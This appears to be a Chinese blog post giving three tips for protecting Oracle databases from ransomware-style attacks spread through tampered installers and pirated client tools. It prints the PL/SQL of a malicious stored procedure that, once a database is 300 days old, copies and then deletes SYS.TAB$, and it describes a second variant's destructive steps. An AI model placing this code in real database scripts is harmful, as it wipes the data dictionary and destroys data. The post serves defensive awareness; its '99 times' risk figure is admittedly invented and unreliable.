数据安全：Oracle数据库避免比特币勒索的3个建议

Posted 2021-04-30 数据工人

比特币喋喋不休。

我一个朋友腰斩转售了。

但是来自比特币勒索的事件却喧嚣尘上。

许多开源数据库的比特币防范，主要靠关闭端口、注意密码和权限，而Oracle数据库却偏偏与众不同。

其实不太想写这个话题，因为我们已经将比特币病毒检查，加入到了Oracle数据库的巡检列表中了，定期检查都能发现潜在的隐藏着。

不过从月初突然又挂起一阵风，貌似比特币病毒又开始兴风作浪，连甲骨文官网都出来出指南了。

正在暗暗纳闷妖风之间，有两个朋友不约而同的谈起，XX数据库被比特币勒索了！

其实Oracle数据库要防范比特币病毒是如此简单。如果你不照做，那就可能要花大概小几万块人民币请各路大侠帮你解忧了。

大道至简，方法非常之简单：

建议1、永远从Oracle官网下载Oracle数据库安装软件，并检查MD5是否一致(18c开始换成更复杂的sha256sum)

不得不说，这一点，我之前完全没有想到。而正是因为近期这股妖风，几乎中病毒的所有用户，都是灾在这里。

• https://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

• https://edelivery.oracle.com

如果这一串和你下载的软件检查的不一致，千万不要安装！

传闻，近期的这一波，就是某个集成商提供的Oracle安装介质被人做了手脚。

在prvtsupp.plb文件里多建了一个DBMS_SUPPORT_DBMONITORP存储过程，和一个DBMS_SUPPORT_DBMONITOR触发器，在你数据库运行满300天的时候，会把tab$直接给delete了。

PROCEDURE DBMS_SUPPORT_DBMONITORP IS

DATE1 INT :=10;

BEGIN 

   SELECT TO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;

   IF (DATE1>=300) THEN 

   EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system  as select * from sys.tab$';

   DELETE SYS.TAB$;

   COMMIT;

   EXECUTE IMMEDIATE 'alter system checkpoint';

   END IF;

END;

所以你数据库就不能用了，再启动open就报错ora-600 [16703],

建议2：不要下载盗版的PL/SQL软件或TOAD软件

我不是在呼吁你去买正版，反正你买不买也没人给我钱。

而是这种情况，是Oracle数据库被比特币勒索的最早来源。

这种方式中病毒的表现是类似这样的：

它主要生成这么几个对象：

DBMS_SUPPORT_INTERNAL

DBMS_SYSTEM_INTERNAL

DBMS_CORE_INTERNAL

1. 当数据库创建时间大于1200天之后，开始备份tab$表

2. 删除tab$中除掉owner#为0和38的记录(sys，xdb)

3. 通过SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION清理掉备份信息(v$controlfile_record_section)

5. 再抛出一个前台的和4类似的警告信息

建议3：不要在任何windows平台上安装Oracle数据库！

在我看来，windows就是一个普通的个人操作系统，从来不适合做一个企业级操作系统。

最重要的不是我的感觉/认为，而是，装在windows上，你的Oracle数据库被比特币病毒侵害的可能性要增加99倍的概率（当然，99是我乱说的，就是告诉你概率太高了）！

装在windows上的oracle，除了上面2种危险外，他直接把数据库软件安装目录里的文件也给你加密了。

这还不是最惨的，毕竟你换个机器装个软件就好了，就跟前面2种一样了。

最惨的是，某个开发商把一些配置文件也放在文件里了，通常这个文件是没有备份的，那问题就要严重得多了。这些数据你可以不要么？

想要数据安全，远离Oracle比特币病毒，严格遵循上述3个建议就好了。

当然，数据安全远不止比特币病毒这么一个点。

今天看到群里转发的银保监会的一则通告截图：

我也不知道具体是哪家银行。

作为一个技术布道者，讲究的是有一说一。在跟每个客户沟通的时候，我反复会强调，我是保健医生，不是江湖郎中。别指望你得了癌症，我一定能妙手回春。所以你需要在基础架构上做投入，在人员、流程上做投入，这样，我们能一起将你的风险降到最低。

这则通知，让我觉得最无趣的是最后一行“监管部门自2016年开始，已多次通报.....该行董事会、高管层履职不力.......”

如果真是这样，真的为这家银行的IT部门感到悲哀！你们就只能静静的背锅吧！

无独有偶，我上周某个晚上，也被领导加到某个故障处理群，没有备份，没有高可用........

对不起，我不是药神，也不是江湖郎中，我只是个保健医生！我能做的，就是点点滴滴，告诉你隐患在哪里，需要大家一起解决，而不是指望我能妙手回春！

比特币病毒也一样！

希望你的数据都平平安安！

更多阅读：

是错的